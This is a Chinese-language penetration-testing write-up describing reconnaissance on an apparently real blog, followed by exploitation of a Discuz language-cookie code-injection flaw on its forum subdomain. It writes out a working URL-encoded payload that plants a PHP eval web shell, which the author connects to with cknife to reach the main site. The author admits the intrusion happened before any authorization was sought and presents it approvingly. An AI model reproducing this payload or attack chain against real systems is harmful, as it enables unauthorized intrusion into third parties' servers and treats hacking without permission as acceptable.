渗透第一步信息收集还是要的哈。
通过Wappalyzer的检测,操作系统以及使用的容器以及框架已经很明白了,不过兼听则明,肯定是要通过其他手段二次确认一下的啦,毕竟这步出错,后面处理起来就很难受了。
直接丢cms识别,得到结果。
三大手段其下,可以得出目标博客的基本信息:
服务器版本:Ubuntu
系统容器:Nginx /1.10.3
框架:Bootstarp 3.2.0
包含脚本: jQuery/1.11.1
然后就是真实IP,旁站以及C段的查询了。
首先查看目标是否使用了cdn,多地ping
发现目标博客未使用cdn,从而得到目标的IP。
得到IP之后,查询旁站和C段,方便后面提供一个思路
旁站查询:
C段:
对于子域名查询,这个是必须的了。
在子域名查询中,发现有几个是没法访问的,不过有个bbs的二级域名是可以访问的,考虑到bbs大多是使用的CMS模板搭建,而且是bbs和博客主站是同IP,访问一波,查看是否有路子可钻。
在页面底部发现CMS信息,Discuz 2.5版本。
等等,好像有个idea,它是英文的,代表它可能是国际版本的discuz,国际版本的discuz在3.2-3.4有个代码注入漏洞,虽然说得是3.2-3.4版本,不过这种低版本一般也是可以试试的吧,反正我又不亏。
直接打开主页/forum.php。
然后打开burp,设置好代理转发之后成功抓到数据包
发现关键字L4tu_2132_language=en,
下一步测试L4tu_2132_language是否对参数进行过滤直接拼接,从而写入缓存文件之中,然后缓存文件随后被加载,造成代码执行。
构造’.phpinfo().’,点击Send,发送数据包请求,点击【Rander】成功看到phpinfo信息。
有戏啊,直接一句话写入。
直接写入不行,编码试试
L4tu_2132_language="%27.file_put_contents%28%27good.php%27%2Curldecode%28%27%253c%253fphp%2520eval%28%2524_%2550%254F%2553%2554%255b%2522goog%2522%255d%29%253b%253f%253e%27%29%29.%27"
顺利ok。
cknife连接试试
顺利搞定。
子域名搞定,而且在同IP,直接查看是否存在www的主博客站点目录。
顺利找到,而且之前那几个无法访问的子域名貌似都在。
剩下就是传马提权了,考虑到国家网络安全法的影响,我就不继续进去了,乖巧的跑去请求授权了,可是大佬一直不理我,我也算了,不继续啦。
无意中还发现一枚大表哥,哈哈。
这个经历说明有些新洞,可能低版本的CMS的漏洞代码还是存在的,看到相同的CMS我们都是可以试试,反正不亏。(多看最新漏洞,并且复现,这个很有用的哈)
转自 乌云安全